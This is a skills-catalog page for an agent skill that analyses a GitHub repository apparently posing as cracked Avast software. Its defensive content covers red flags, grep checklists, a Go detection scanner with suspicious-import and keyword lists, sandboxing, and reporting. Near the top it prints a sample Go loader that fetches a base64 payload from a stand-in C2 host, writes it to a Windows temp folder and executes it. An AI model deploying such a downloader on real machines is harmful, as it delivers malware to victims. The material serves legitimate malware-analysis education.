skillZs
LIVE SKILL TAGS
>>> LIVE SKILLS INDEX <<<
* OPEN SOURCE *
NO LOGIN, NO TRACKING
REAL INSTALL DATA
← back to all skills
aradotso/security-skills855 installs

malware-analysis-dragonflyTomb-avast

Analyze and understand malware distribution techniques disguised as legitimate security software installers

How do I install this agent skill?

npx skills add https://github.com/aradotso/security-skills --skill malware-analysis-dragonflytomb-avast
view source ↗

Is this agent skill safe to install?

  • Gen Agent Trust Hubpass

    This skill is a security research and educational tool designed to help identify and analyze malware distribution techniques. It contains legitimate detection patterns, forensic code examples, and links to official resources.

  • Socketpass

    No alerts

  • Snykfail

    Risk: CRITICAL · 3 issues

What does this agent skill do?

DragonflyTomb/Avast-Premium-Security-2026 Analysis

Skill by ara.so — Security Skills collection

⚠️ WARNING: Malware Distribution Repository

This repository is NOT legitimate Avast Premium Security software. It exhibits multiple red flags consistent with malware distribution disguised as cracked security software.

Threat Indicators

Repository Red Flags

  1. Unauthorized Distribution: Avast Corporation does not distribute software via GitHub repositories named "DragonflyTomb"
  2. Crack/Keygen Keywords: Terms like "Keygen", "Pre-Activated", "Loader", "Serial" indicate piracy or malware
  3. Suspicious Topics: Includes "retdec" (reverse engineering tool) in security software context
  4. No README: Legitimate software repositories include documentation
  5. Artificial Stars: 60 stars at 5 stars/day suggests manipulation
  6. No License: "NOASSERTION" for commercial software is suspicious
  7. Future Date: Claims to be "2026" version (likely timestamp manipulation)

Common Malware Distribution Patterns

// Typical malware loader pattern in Go
package main

import (
    "encoding/base64"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
)

// WARNING: This is example malware behavior - DO NOT USE
func suspiciousDownloader() {
    // Downloads secondary payload
    resp, _ := http.Get("hxxp://malicious-c2-server.com/payload")
    defer resp.Body.Close()
    
    payload, _ := ioutil.ReadAll(resp.Body)
    decoded, _ := base64.StdEncoding.DecodeString(string(payload))
    
    // Writes to system directory
    ioutil.WriteFile("C:\\Windows\\Temp\\update.exe", decoded, 0755)
    
    // Executes with elevated privileges
    exec.Command("cmd", "/c", "C:\\Windows\\Temp\\update.exe").Run()
}

Analysis Techniques

Static Analysis Checklist

# Check for suspicious imports (if source code available)
grep -r "syscall" .
grep -r "unsafe" .
grep -r "net/http" .
grep -r "os/exec" .
grep -r "crypto" .

# Look for obfuscation patterns
grep -r "base64" .
grep -r "XOR" .
grep -r "decode" .

# Check for persistence mechanisms
grep -r "Registry" .
grep -r "Startup" .
grep -r "Task Scheduler" .

Detection Code Example

package main

import (
    "crypto/sha256"
    "fmt"
    "io"
    "os"
    "path/filepath"
    "strings"
)

// MalwareIndicators represents suspicious patterns
type MalwareIndicators struct {
    SuspiciousImports  []string
    ObfuscationDetected bool
    NetworkConnections  []string
    FileHash           string
}

// AnalyzeGoFile checks for malware indicators
func AnalyzeGoFile(path string) (*MalwareIndicators, error) {
    content, err := os.ReadFile(path)
    if err != nil {
        return nil, err
    }
    
    indicators := &MalwareIndicators{
        SuspiciousImports: []string{},
    }
    
    // Check for suspicious imports
    suspiciousPackages := []string{
        "syscall",
        "unsafe",
        "os/exec",
        "net/http",
        "crypto/aes",
    }
    
    contentStr := string(content)
    for _, pkg := range suspiciousPackages {
        if strings.Contains(contentStr, fmt.Sprintf(`"%s"`, pkg)) {
            indicators.SuspiciousImports = append(indicators.SuspiciousImports, pkg)
        }
    }
    
    // Check for obfuscation
    if strings.Contains(contentStr, "base64") || 
       strings.Contains(contentStr, "XOR") ||
       strings.Contains(contentStr, "decode") {
        indicators.ObfuscationDetected = true
    }
    
    // Calculate file hash
    f, _ := os.Open(path)
    defer f.Close()
    h := sha256.New()
    io.Copy(h, f)
    indicators.FileHash = fmt.Sprintf("%x", h.Sum(nil))
    
    return indicators, nil
}

// ScanRepository analyzes all Go files in directory
func ScanRepository(rootDir string) {
    filepath.Walk(rootDir, func(path string, info os.FileInfo, err error) error {
        if strings.HasSuffix(path, ".go") {
            indicators, err := AnalyzeGoFile(path)
            if err != nil {
                return nil
            }
            
            if len(indicators.SuspiciousImports) > 0 || indicators.ObfuscationDetected {
                fmt.Printf("⚠️  Suspicious file: %s\n", path)
                fmt.Printf("   Hash: %s\n", indicators.FileHash)
                fmt.Printf("   Imports: %v\n", indicators.SuspiciousImports)
                fmt.Printf("   Obfuscated: %v\n\n", indicators.ObfuscationDetected)
            }
        }
        return nil
    })
}

Safe Investigation Practices

Sandbox Environment Setup

# Use isolated VM or container
docker run -it --rm --network none golang:1.21 /bin/bash

# Clone repository in isolated environment
cd /tmp
git clone https://github.com/DragonflyTomb/Avast-Premium-Security-2026

# Analyze without executing
cd Avast-Premium-Security-2026
find . -type f -name "*.go" | head -10

Binary Analysis Tools

# If compiled binaries are present
strings suspicious_binary.exe | grep -i "http"
strings suspicious_binary.exe | grep -i "password"
strings suspicious_binary.exe | grep -i "admin"

# Check for packed/obfuscated binaries
file suspicious_binary.exe
xxd suspicious_binary.exe | head -50

Reporting Malware

GitHub Abuse Report

# Report repository via GitHub's abuse form
# URL: https://github.com/contact/report-abuse

# Include:
# - Repository URL
# - Description: "Malware distribution disguised as Avast Premium Security"
# - Evidence: Keywords like keygen, loader, pre-activated

VirusTotal Submission

package main

import (
    "bytes"
    "fmt"
    "io"
    "mime/multipart"
    "net/http"
    "os"
)

// SubmitToVirusTotal uploads suspicious file for analysis
func SubmitToVirusTotal(filePath string) error {
    apiKey := os.Getenv("VIRUSTOTAL_API_KEY")
    if apiKey == "" {
        return fmt.Errorf("VIRUSTOTAL_API_KEY not set")
    }
    
    file, err := os.Open(filePath)
    if err != nil {
        return err
    }
    defer file.Close()
    
    body := &bytes.Buffer{}
    writer := multipart.NewWriter(body)
    part, _ := writer.CreateFormFile("file", filePath)
    io.Copy(part, file)
    writer.Close()
    
    req, _ := http.NewRequest("POST", "https://www.virustotal.com/vtapi/v2/file/scan", body)
    req.Header.Set("Content-Type", writer.FormDataContentType())
    req.Header.Set("x-apikey", apiKey)
    
    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        return err
    }
    defer resp.Body.Close()
    
    fmt.Printf("VirusTotal response: %d\n", resp.StatusCode)
    return nil
}

Prevention Guidance

For Developers

  1. Never download from unofficial sources
  2. Verify digital signatures on legitimate software
  3. Check official vendor websites for authentic downloads
  4. Use package managers where possible
  5. Enable EDR/XDR solutions on development machines

For Security Teams

// GitHub repository monitoring
package main

import (
    "context"
    "fmt"
    "github.com/google/go-github/v50/github"
    "strings"
)

// MonitorSuspiciousRepos searches for malware distribution patterns
func MonitorSuspiciousRepos(ctx context.Context, token string) {
    client := github.NewClient(nil).WithAuthToken(token)
    
    keywords := []string{
        "keygen", "crack", "loader", "pre-activated",
        "premium serial", "full version installer",
    }
    
    for _, keyword := range keywords {
        query := fmt.Sprintf("%s in:description language:go", keyword)
        opts := &github.SearchOptions{
            ListOptions: github.ListOptions{PerPage: 10},
        }
        
        results, _, err := client.Search.Repositories(ctx, query, opts)
        if err != nil {
            continue
        }
        
        for _, repo := range results.Repositories {
            fmt.Printf("⚠️  Suspicious: %s\n", repo.GetFullName())
            fmt.Printf("   Description: %s\n", repo.GetDescription())
            fmt.Printf("   Stars: %d\n\n", repo.GetStargazersCount())
        }
    }
}

Legitimate Avast Resources

Conclusion

This repository represents a malware distribution operation using social engineering tactics. Always obtain security software directly from verified vendor sources and never trust "cracked", "keygen", or "pre-activated" versions of commercial software.

Add the canonical catalog link to the repository README so users can inspect current installs and available audits. The publishing guide covers the complete discovery path.

<a href="https://skillzs.dev/skills/aradotso/security-skills/malware-analysis-dragonflytomb-avast">View malware-analysis-dragonflyTomb-avast on skillZs</a>